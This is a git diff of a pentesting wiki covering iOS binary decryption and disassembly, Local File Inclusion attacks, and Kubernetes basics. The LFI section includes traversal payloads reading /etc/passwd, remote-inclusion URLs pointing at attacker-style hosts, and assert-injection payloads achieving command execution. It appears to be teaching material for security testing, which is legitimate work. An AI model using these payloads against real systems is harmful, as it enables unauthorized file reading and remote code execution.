GitBook: [master] 3 pages and 8 assets modified
BIN
.gitbook/assets/image (458) (1) (1).png
Normal file
After Width: | Height: | Size: 232 KiB |
Before Width: | Height: | Size: 232 KiB After Width: | Height: | Size: 40 KiB |
Before Width: | Height: | Size: 184 KiB After Width: | Height: | Size: 40 KiB |
Before Width: | Height: | Size: 206 KiB After Width: | Height: | Size: 206 KiB |
Before Width: | Height: | Size: 75 KiB After Width: | Height: | Size: 75 KiB |
BIN
.gitbook/assets/image (468) (1).png
Normal file
After Width: | Height: | Size: 184 KiB |
|
@ -57,10 +57,80 @@ Note that **applications signed by the same signing certificate can share resour
|
|||
## Obfuscation
|
||||
|
||||
Unlike an Android Application, the binary of an iOS app **can only be disassembled** and not decompiled.
|
||||
When an application is submitted to the app store, Apple first verifies the app conduct and before releasing it to the app-store, **Apple encrypts the binary**. So the binary download from the app store is encrypted complicating ting the reverse-engineering tasks.
|
||||
When an application is submitted to the app store, Apple first verifies the app conduct and before releasing it to the app-store, **Apple encrypts the binary using** [**FairPlay**](https://developer.apple.com/streaming/fps/). So the binary download from the app store is encrypted complicating ting the reverse-engineering tasks.
|
||||
|
||||
However, note that there are other **third party software that can be used to obfuscate** the resulting binaries.
|
||||
|
||||
### Removing App Store Encryption
|
||||
|
||||
In order to run the encrypted binary, the device needs to decrypt it in memory. Then, it's possible to **dump the decrypted binary from the memory**.
|
||||
|
||||
First, check if the binary is compiled with the PIE \(Position Independent Code\) flag:
|
||||
|
||||
```bash
|
||||
otool -Vh Original_App #Check the last word of the last line of this code
|
||||
Home:
|
||||
Mach header
|
||||
magic cputype cpusubtype caps filetype ncmds sizeofcmds flags
|
||||
MH_MAGIC_64 X86_64 ALL 0x00 EXECUTE 47 6080 NOUNDEFS DYLDLINK TWOLEVEL PIE
|
||||
```
|
||||
|
||||
If it's set you can use the script [`change_macho_flags.py`](https://chromium.googlesource.com/chromium/src/+/49.0.2623.110/build/mac/change_mach_o_flags.py) to remove it with python2:
|
||||
|
||||
```bash
|
||||
python change_mach_o_flags.py --no-pie Original_App
|
||||
otool -Vh Hello_World
|
||||
Hello_World:
|
||||
Mach header
|
||||
magic cputype cpusubtype caps filetype ncmds sizeofcmds flags
|
||||
MH_MAGIC ARM V7 0x00 EXECUTE 22 2356 NOUNDEFS DYLDLINK TWOLEVEL MH_NO_HEAP_EXECUTION
|
||||
```
|
||||
|
||||
Now that the PIE flag isn't set, the OS will load the program at a **fixed starting location** every-time. In order to find this **location** you can use:
|
||||
|
||||
```bash
|
||||
otool -l Original_App | grep -A 3 LC_SEGMENT | grep -A 1 __TEXT
|
||||
segname __TEXT
|
||||
vmaddr 0x00001000
|
||||
```
|
||||
|
||||
Then, it's necessary to extract the the memory range that needs to be dumped:
|
||||
|
||||
```bash
|
||||
otool -l Original_App | grep -A 4 LC_ENCRYPTION_INFO
|
||||
cmd LC_ENCRYPTION_INFO
|
||||
cmdsize 20
|
||||
cryptoff 4096
|
||||
cryptsize 4096
|
||||
cryptid 0
|
||||
```
|
||||
|
||||
The value of **`cryptoff`** indicated the starting address of the encrypted content and the **`cryptsize`** indicates the size of the encrypted content.
|
||||
|
||||
So, the `start address` to dump will be `vmaddr + cryptoff` and the `end address` will be the `start address + cryptsize`
|
||||
In this case: `start_address = 0x1000 + 0x1000 = 0x2000` __and `end_address = 0x2000 + 0x1000 = 0x3000`
|
||||
|
||||
With this information it's just necessary to run the application in the jailbroken device, attach to the process with gdb \(`gdb -p <pid>`\) and dump the memory:
|
||||
|
||||
```bash
|
||||
dump memory dump.bin 0x2000 0x3000
|
||||
```
|
||||
|
||||
Congrats! You have decrypted the encrypted section in dump.bin. Now **transfer this dump to your computer and overwrite the encrypted section with the decrypted** one:
|
||||
|
||||
```bash
|
||||
dd bs=1 seek=<starting_address> conv=notrunc if=dump.bin of=Original_App
|
||||
```
|
||||
|
||||
There is one more step to complete. The application is still **indicating** in its metadata that it's **encrypted**, but it **isn't**. Then, when executed, the device will try to decrypt the already decrypted section and it's going to fail.
|
||||
However, you can use tools like [**MachOView**](https://sourceforge.net/projects/machoview/) to change this info. Just open the binary and set the **cryptid** to 0:
|
||||
|
||||
![](../.gitbook/assets/image%20%28458%29.png)
|
||||
|
||||
### Removing App Store Encryption Automatically
|
||||
|
||||
You can use tools like [**Clutch**](https://github.com/KJCracks/Clutch) to automatically remove the encryption and an app.
|
||||
|
||||
## IPA Reversing
|
||||
|
||||
`.ipa` files are zipped packages, so change the extension to `.zip` and decompress them. After decompressing them you should see an `.app` folder. This **folder contains the files of the application**.
|
||||
|
@ -88,7 +158,77 @@ DVIA-v2:
|
|||
[...]
|
||||
```
|
||||
|
||||
#### Check if the app is encrypted
|
||||
|
||||
See if there is any output for:
|
||||
|
||||
```bash
|
||||
otool -l <app-binary> | grep -A 4 LC_ENCRYPTION_INFO
|
||||
```
|
||||
|
||||
#### Disassembling the binary
|
||||
|
||||
Disassemble the text section:
|
||||
|
||||
```bash
|
||||
otool -tV DVIA-v2
|
||||
DVIA-v2:
|
||||
(__TEXT,__text) section
|
||||
+[DDLog initialize]:
|
||||
0000000100004ab8 sub sp, sp, #0x60
|
||||
0000000100004abc stp x29, x30, [sp, #0x50] ; Latency: 6
|
||||
0000000100004ac0 add x29, sp, #0x50
|
||||
0000000100004ac4 sub x8, x29, #0x10
|
||||
0000000100004ac8 mov x9, #0x0
|
||||
0000000100004acc adrp x10, 1098 ; 0x10044e000
|
||||
0000000100004ad0 add x10, x10, #0x268
|
||||
```
|
||||
|
||||
To print the **Objective-C segment** of the sample application one can use:
|
||||
|
||||
```bash
|
||||
otool -oV DVIA-v2
|
||||
DVIA-v2:
|
||||
Contents of (__DATA,__objc_classlist) section
|
||||
00000001003dd5b8 0x1004423d0 _OBJC_CLASS_$_DDLog
|
||||
isa 0x1004423a8 _OBJC_METACLASS_$_DDLog
|
||||
superclass 0x0 _OBJC_CLASS_$_NSObject
|
||||
cache 0x0 __objc_empty_cache
|
||||
vtable 0x0
|
||||
data 0x1003de748
|
||||
flags 0x80
|
||||
instanceStart 8
|
||||
```
|
||||
|
||||
In order to obtain a more compact Objective-C code you can use [**class-dump**](http://stevenygard.com/projects/class-dump/):
|
||||
|
||||
```bash
|
||||
class-dump some-app
|
||||
//
|
||||
// Generated by class-dump 3.5 (64 bit).
|
||||
//
|
||||
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
|
||||
//
|
||||
|
||||
#pragma mark Named Structures
|
||||
|
||||
struct CGPoint {
|
||||
double _field1;
|
||||
double _field2;
|
||||
};
|
||||
|
||||
struct CGRect {
|
||||
struct CGPoint _field1;
|
||||
struct CGSize _field2;
|
||||
};
|
||||
|
||||
struct CGSize {
|
||||
double _field1;
|
||||
double _field2;
|
||||
};
|
||||
```
|
||||
|
||||
However, the best options to disassemble the binary are: [**Hopper**](https://www.hopperapp.com/download.html?) and [**IDA**](https://www.hex-rays.com/products/ida/support/download_freeware/).
|
||||
|
||||
## Testing
|
||||
|
||||
|
|
|
@ -45,7 +45,7 @@ Check the LFI list of linux.
|
|||
|
||||
## Basic LFI and bypasses
|
||||
|
||||
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=http://myserver.com/phpshellcode.txt\).
|
||||
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt\)\).
|
||||
|
||||
```text
|
||||
http://example.com/index.php?page=../../../etc/passwd
|
||||
|
@ -130,7 +130,7 @@ http://example.com/index.php?page=\\attacker.com\shared\mal.php
|
|||
|
||||
## Top 25 parameters
|
||||
|
||||
Here’s list of top 25 parameters that could be vulnerable to local file inclusion \(LFI\) vulnerabilities \(from [link](https://twitter.com/trbughunters/status/1279768631845494787)\):
|
||||
Here’s list of top 25 parameters that could be vulnerable to local file inclusion \(LFI\) vulnerabilities \(from [link](https://twitter.com/trbughunters/status/1279768631845494787)\):
|
||||
|
||||
```text
|
||||
?cat={payload}
|
||||
|
@ -255,7 +255,7 @@ And you can compile the `phar` executing the following line:
|
|||
php --define phar.readonly=0 create_path.php
|
||||
```
|
||||
|
||||
A file called `test.phar` will be generated that you can use to abuse the LFI.
|
||||
A file called `test.phar` will be generated that you can use to abuse the LFI.
|
||||
|
||||
If the LFI is just reading the file and not executing the php code inside of it, for example using functions like _**file\_get\_contents\(\), fopen\(\), file\(\) or file\_exists\(\), md5\_file\(\), filemtime\(\) or filesize\(\)**_**.** You can try to abuse a **deserialization** occurring when **reading** a **file** using the **phar** protocol.
|
||||
For more information read the following post:
|
||||
|
@ -267,17 +267,23 @@ For more information read the following post:
|
|||
If you encounter a difficult LFI that appears to be filtering traversal strings such as ".." and responding with something along the lines of "Hacking attempt" or "Nice try!", an 'assert' injection payload may work.
|
||||
|
||||
A payload like this:
|
||||
```
|
||||
|
||||
```text
|
||||
' and die(show_source('/etc/passwd')) or '
|
||||
```
|
||||
|
||||
will successfully exploit PHP code for a "file" parameter that looks like this:
|
||||
```
|
||||
|
||||
```text
|
||||
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
|
||||
```
|
||||
It's also possible to get RCE in a vulnerable "assert" statement using the system() function:
|
||||
```
|
||||
|
||||
It's also possible to get RCE in a vulnerable "assert" statement using the system\(\) function:
|
||||
|
||||
```text
|
||||
' and die(system("whoami")) or '
|
||||
```
|
||||
|
||||
Be sure to URL-encode payloads before you send them.
|
||||
|
||||
## LFI2RCE
|
||||
|
@ -342,7 +348,7 @@ Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
|
|||
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
|
||||
```
|
||||
|
||||
In PHP these sessions are stored into _/var/lib/php5/sess\_\[PHPSESSID\]_ files
|
||||
In PHP these sessions are stored into _/var/lib/php5/sess\_\[PHPSESSID\]\_ files
|
||||
|
||||
```text
|
||||
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
|
||||
|
@ -377,13 +383,13 @@ To exploit this vulnerability you need: **A LFI vulnerability, a page where phpi
|
|||
|
||||
**Tutorial HTB**: [https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s](https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s)
|
||||
|
||||
You need to fix the exploit \(change **=>** for **=>**\). To do so you can do:
|
||||
You need to fix the exploit \(change **=>** for **=>**\). To do so you can do:
|
||||
|
||||
```text
|
||||
sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\>/g' phpinfolfi.py
|
||||
```
|
||||
|
||||
You have to change also the **payload** at the beginning of the exploit \(for a php-rev-shell for example\), the **REQ1** \(this should point to the phpinfo page and should have the padding included, i.e.: _REQ1="""POST /install.php?mode=phpinfo&a="""+padding+""" HTTP/1.1\r_\), and **LFIREQ** \(this should point to the LFI vulnerability, i.e.: _LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r --_ Check the double "%" when exploiting null char\)
|
||||
You have to change also the **payload** at the beginning of the exploit \(for a php-rev-shell for example\), the **REQ1** \(this should point to the phpinfo page and should have the padding included, i.e.: _REQ1="""POST /install.php?mode=phpinfo&a="""+padding+""" HTTP/1.1\r_\), and **LFIREQ** \(this should point to the LFI vulnerability, i.e.: _LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r --_ Check the double "%" when exploiting null char\)
|
||||
|
||||
{% file src="../../.gitbook/assets/lfi-with-phpinfo-assistance.pdf" %}
|
||||
|
||||
|
@ -393,7 +399,7 @@ If uploads are allowed in PHP and you try to upload a file, this files is stored
|
|||
|
||||
Then, if have found a LFI vulnerability in the web server you can try to guess the name of the temporary file created and exploit a RCE accessing the temporary file before it is deleted.
|
||||
|
||||
In **Windows** the files are usually stored in **C:\Windows\temp\php<<**
|
||||
In **Windows** the files are usually stored in **C:\Windows\temp\php<<**
|
||||
|
||||
In **linux** the name of the file use to be **random** and located in **/tmp**. As the name is random, it is needed to **extract from somewhere the name of the temporal file** and access it before it is deleted. This can be done reading the value of the **variable $\_FILES** inside the content of the function "**phpconfig\(\)**".
|
||||
|
||||
|
@ -430,6 +436,5 @@ print('[x] Something went wrong, please try again')
|
|||
[PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal)
|
||||
[PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders)
|
||||
|
||||
|
||||
{% file src="../../.gitbook/assets/en-local-file-inclusion-1.pdf" %}
|
||||
|
||||
|
|
|
@ -21,7 +21,7 @@
|
|||
* **Pod**: Wrapper around a container or multiple containers with. A pod should only contain one application \(so usually, a pod run just 1 container\). The pod is the way kubernetes abstracts the container technology running.
|
||||
* **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** \(with a different internal IP\) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service. When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints`
|
||||
|
||||
![](../../.gitbook/assets/image%20%28466%29.png)
|
||||
![](../../.gitbook/assets/image%20%28467%29.png)
|
||||
|
||||
* **Kubelet**: Primary node agent. The component that establishes communication between node and kubectl, and only can run pods \(through API server\). The kubelet doesn’t manage containers that were not created by Kubernetes.
|
||||
* **Kube-proxy**: is the service in charge of the communications \(services\) between the apiserver and the node. The base is an IPtables for nodes. Most experienced users could install other kube-proxies from other vendors.
|
||||
|
@ -143,7 +143,7 @@ kubectl apply -f deployment.yml
|
|||
Each configuration file has 3 parts: **metadata**, **specification** \(what need to be launch\), **status** \(desired state\).
|
||||
Inside the specification of the deployment configuration file you can find the template defined with a new configuration structure defining the image to run:
|
||||
|
||||
![](../../.gitbook/assets/image%20%28458%29.png)
|
||||
![](../../.gitbook/assets/image%20%28458%29%20%281%29.png)
|
||||
|
||||
#### Example of Deployment + Service declared in the same configuration file \(from [here](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml)\)
|
||||
|
||||
|
|